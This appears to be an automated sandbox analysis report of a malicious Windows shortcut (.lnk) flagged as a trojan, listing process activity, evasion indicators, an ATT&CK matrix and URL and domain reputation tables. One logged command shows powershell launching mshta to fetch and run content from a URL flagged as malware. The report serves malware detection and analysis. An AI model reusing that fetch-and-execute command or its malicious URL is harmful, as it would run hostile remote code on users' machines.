Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2286Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 904Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1460Thread sleep count: 2286 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1460Thread sleep count: 904 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5916Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2699708620.000001BD65E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2701605901.000001BD6B454000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdClass
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nextoJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
11
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
8t6beMY1wO.lnk34%VirustotalBrowse
8t6beMY1wO.lnk46%ReversingLabsShortcut.Trojan.Pantera
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
vidstreemz.b-cdn.net12%VirustotalBrowse
bunnycdn.com0%VirustotalBrowse
bunnyfonts.b-cdn.net0%VirustotalBrowse
bunny.net0%VirustotalBrowse
bunnycdn.b-cdn.net1%VirustotalBrowse
fonts.bunny.net0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://bunnycdn.com/~0%Avira URL Cloudsafe
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...4B0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyr0%Avira URL Cloudsafe
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg)M0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svg0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff)0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff)0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssC0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/0%VirustotalBrowse
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgUXo0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css?0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svg0%VirustotalBrowse
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff2)0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css?0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff)0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/nexto...100%Avira URL Cloudmalware
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff)0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svgb(0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/nexto...0%VirustotalBrowse
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff)0%Avira URL Cloudsafe
https://bunny.net(0%Avira URL Cloudsafe
http://fonts.bunny.net/css?family=Rubik:300,400,500,700,9000%Avira URL Cloudsafe
https://fonts.bunny.net/p0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff2)0%Avira URL Cloudsafe
https://bunny.net/0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-aW0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svgx0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)0%Avira URL Cloudsafe
https://bunny.net/0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)0%VirustotalBrowse
https://fonts.bunny.net/css?family=Rubik:300,400,500,700,9000%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svg...0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svgcss/unconfigured.css0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-300-normal.woff)0%VirustotalBrowse
http://crl.ver)0%Avira URL Cloudsafe
https://g.live.com/odclientsettings/ProdV2/C:0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff)0%Avira URL Cloudsafe
http://fonts.bunny.net/css?family=Rubik:300,400,500,700,9000%VirustotalBrowse
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg7X0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latinD0%Avira URL Cloudsafe
http://fonts.bunny.net/0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrilli0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff2)0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/nexto$global:?0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2)0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/nextoC:0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/nexto(0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normw0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-300-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff2)0%Avira URL Cloudsafe
https://bunny.net/%z0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-700-normal.woff)0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff2)0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/nexto;100%Avira URL Cloudmalware
https://bunny.net/v0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/nextoubik:3000%Avira URL Cloudsafe
https://bunny.net/x0%Avira URL Cloudsafe
https://bunny.net/t0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff2)0%Avira URL Cloudsafe
https://bunny.net/l0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-900-normal.woff)0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/nexto100%Avira URL Cloudmalware
https://fonts.bunny.net/rubik/files/rubik-arabic-400-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/nextoH0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normalformat(0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff2)0%Avira URL Cloudsafe
https://vidstreemz.b-cdn.net/nextoY0%Avira URL Cloudsafe
https://bunny.net/S0%Avira URL Cloudsafe
https://fonts.bunny.0%Avira URL Cloudsafe
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...0%Avira URL Cloudsafe
https://bunny.net/O0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff2)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff)0%Avira URL Cloudsafe
https://bunny.net/P0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-500-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-500-normal.woff2)0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
vidstreemz.b-cdn.net
138.199.36.7
truetrueunknown
bunnycdn.com
169.150.247.36
truefalseunknown
bunnyfonts.b-cdn.net
169.150.236.104
truefalseunknown
bunny.net
169.150.247.39
truefalseunknown
bunnycdn.b-cdn.net
169.150.247.37
truefalseunknown
fonts.bunny.net
unknown
unknownfalseunknown
NameMaliciousAntivirus DetectionReputation
https://bunny.net/v2/images/bunnynet-logo.svgfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://fonts.bunny.net/css?family=Rubik:300,400,500,700,900false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/css?family=Rubik:300,400,500,700,900false
  • Avira URL Cloud: safe
unknown
https://vidstreemz.b-cdn.net/nextotrue
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg...4Bmshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrmshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/~mshta.exe, 00000004.00000002.2700827513.00000279E7826000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg)Mmshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)css[1].css.4.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff)mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.b-cdn.net/mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff)mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssCmshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgUXomshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
